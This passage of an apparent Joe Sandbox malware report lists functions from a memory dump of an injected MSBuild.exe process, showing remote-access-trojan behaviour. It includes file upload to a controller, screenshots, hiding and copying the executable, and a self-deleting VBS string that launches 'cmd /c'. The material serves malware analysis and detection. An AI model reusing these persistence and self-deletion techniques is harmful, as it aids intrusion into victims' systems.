                                                                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                        • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                        • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                        • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Write$Create
                                                                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                                                                        • API String ID: 1602526932-4212202414
                                                                                                                        • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                        • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                        • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                        • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                        Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                        • API String ID: 1646373207-89630625
                                                                                                                        • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                        • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                        • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                        • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                        Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                        • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                        • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                        • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                        • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                        • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$del$open$BG$BG
                                                                                                                        • API String ID: 1579085052-1088133900
                                                                                                                        • Opcode ID: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                                        • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                                        • Opcode Fuzzy Hash: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                                        • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                        Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                                        • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                                        • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                                        • GetLastError.KERNEL32 ref: 0041B313
                                                                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                                        • GetLastError.KERNEL32 ref: 0041B370
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 3941738427-1684325040
                                                                                                                        • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                        • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                                        • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                        • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                                        Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3899193279-0
                                                                                                                        • Opcode ID: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                                                                                        • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                                        • Opcode Fuzzy Hash: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                                                                                        • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                                        Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                          • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                        • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                        • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                        • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                        • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                        • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                        • API String ID: 1223786279-3931108886
                                                                                                                        • Opcode ID: 696cd0f1f2beb549affe8c61bf5a60ef638a1338d59b97c6b305aa4f37f6b483
                                                                                                                        • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                                        • Opcode Fuzzy Hash: 696cd0f1f2beb549affe8c61bf5a60ef638a1338d59b97c6b305aa4f37f6b483
                                                                                                                        • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                                        Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                        • API String ID: 2490988753-744132762
                                                                                                                        • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                        • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                                        • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                        • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                                        Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                        • API String ID: 1332880857-3714951968
                                                                                                                        • Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                                        • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                                        • Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                                        • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                                        Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                                        • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                                        • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                                        • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                                        • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                                        • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                        • String ID: Close
                                                                                                                        • API String ID: 1657328048-3535843008
                                                                                                                        • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                        • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                                        • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                        • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                                        Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$Info
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2509303402-0
                                                                                                                        • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                                        • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                                        • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                                        • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                                        Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                        • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                        • API String ID: 1884690901-3066803209
                                                                                                                        • Opcode ID: e7cb10d7a94769719a081af647e736dceef02ed1fe18e96074c9815947bd0f8d
                                                                                                                        • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                                        • Opcode Fuzzy Hash: e7cb10d7a94769719a081af647e736dceef02ed1fe18e96074c9815947bd0f8d
                                                                                                                        • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                                        Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                                        • _free.LIBCMT ref: 004500A6
                                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                        • _free.LIBCMT ref: 004500C8
                                                                                                                        • _free.LIBCMT ref: 004500DD
                                                                                                                        • _free.LIBCMT ref: 004500E8
                                                                                                                        • _free.LIBCMT ref: 0045010A
                                                                                                                        • _free.LIBCMT ref: 0045011D
                                                                                                                        • _free.LIBCMT ref: 0045012B
                                                                                                                        • _free.LIBCMT ref: 00450136
                                                                                                                        • _free.LIBCMT ref: 0045016E
                                                                                                                        • _free.LIBCMT ref: 00450175
                                                                                                                        • _free.LIBCMT ref: 00450192
                                                                                                                        • _free.LIBCMT ref: 004501AA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 161543041-0
                                                                                                                        • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                        • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                                        • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                        • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                                        Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                                        • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                        • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                        • API String ID: 489098229-65789007
                                                                                                                        • Opcode ID: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                                        • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                                        • Opcode Fuzzy Hash: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                                        • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                                        Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                        • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                        • API String ID: 1913171305-390638927
                                                                                                                        • Opcode ID: 39b3ce55d3e57c7dd47d2fbf93a6b3f51a62715a063ab856270c8441b234f796
                                                                                                                        • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
